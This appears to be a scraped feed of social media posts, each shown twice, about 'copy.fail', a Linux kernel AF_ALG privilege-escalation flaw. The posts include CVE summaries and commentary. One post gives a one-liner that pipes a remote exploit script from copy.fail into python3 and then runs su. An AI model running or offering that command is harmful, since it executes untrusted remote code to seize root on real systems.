android.googlesource.com/platform/sys...
Android has a versioned app sandbox which gets stricter for new API levels. The versioned domains inherit from that untrusted_app_all domain.
android.googlesource.com/platform/sys...
Android has a versioned app sandbox which gets stricter for new API levels. The versioned domains inherit from that untrusted_app_all domain.
Full story here: ostechnix.com/linux-kernel...
#AF_ALG #LinuxCryptoSubsystem #Linuxkernel #Linuxsecurity #EricBiggers #LinuxkernelHardening #Opensource
Full story here: ostechnix.com/linux-kernel...
#AF_ALG #LinuxCryptoSubsystem #Linuxkernel #Linuxsecurity #EricBiggers #LinuxkernelHardening #Opensource
xint.io/blog/copy-fa...
I am going to link to this while rejecting changes to Go crypto for years.
Anyway, feeling pretty validated in my "ssh in as root, only gVisor or Firecracker are an actual security boundary" approach.
xint.io/blog/copy-fa...
I am going to link to this while rejecting changes to Go crypto for years.
Anyway, feeling pretty validated in my "ssh in as root, only gVisor or Firecracker are an actual security boundary" approach.
curl copy.fail/exp | python3 && su
Pour passer root sur n'importe quelle distro depuis 2017 ...
copy.fail
curl copy.fail/exp | python3 && su
Pour passer root sur n'importe quelle distro depuis 2017 ...
copy.fail
https://acetrum.com?utm_source=bluesky&utm_medium=social
https://acetrum.com?utm_source=bluesky&utm_medium=social
It'll be better than that insecure windows os, they said...
1000s of eyes in Open source exposes vulns early, they said...
copy.fail
It'll be better than that insecure windows os, they said...
1000s of eyes in Open source exposes vulns early, they said...
copy.fail
Linux Kernel
CVSS 7.8 / EPSS 0% / KEV: No
TL;DR: In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow …
https://cvesentinel.com/report/CVE-2025-39964?utm_source=bluesky&utm_medium=social&utm_campaign=cvesentinel
#infosec #CVE #vulnerability
Linux Kernel
CVSS 7.8 / EPSS 0% / KEV: No
TL;DR: In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow …
https://cvesentinel.com/report/CVE-2025-39964?utm_source=bluesky&utm_medium=social&utm_campaign=cvesentinel
#infosec #CVE #vulnerability
A CISA acrescentou a 18 de setembro três vulnerabilidades do kernel Linux ao catálogo...
A CISA acrescentou a 18 de setembro três vulnerabilidades do kernel Linux ao catálogo...
Analyze the mechanics of CVE-2025-39964 with our technical Linux TSUITE brief, covering AF_ALG race conditions, CrowdStrike CQL queries, and endpoint hardening....
https://thecybermind.co/dxag
Analyze the mechanics of CVE-2025-39964 with our technical Linux TSUITE brief, covering AF_ALG race conditions, CrowdStrike CQL queries, and endpoint hardening....
https://thecybermind.co/dxag
This is the worst Linux vulnerability in years. TL;DR copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC. It abuses the kernel crypto API (AF_ALG sockets) plus splice() to…
This is the worst Linux vulnerability in years. TL;DR copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC. It abuses the kernel crypto API (AF_ALG sockets) plus splice() to…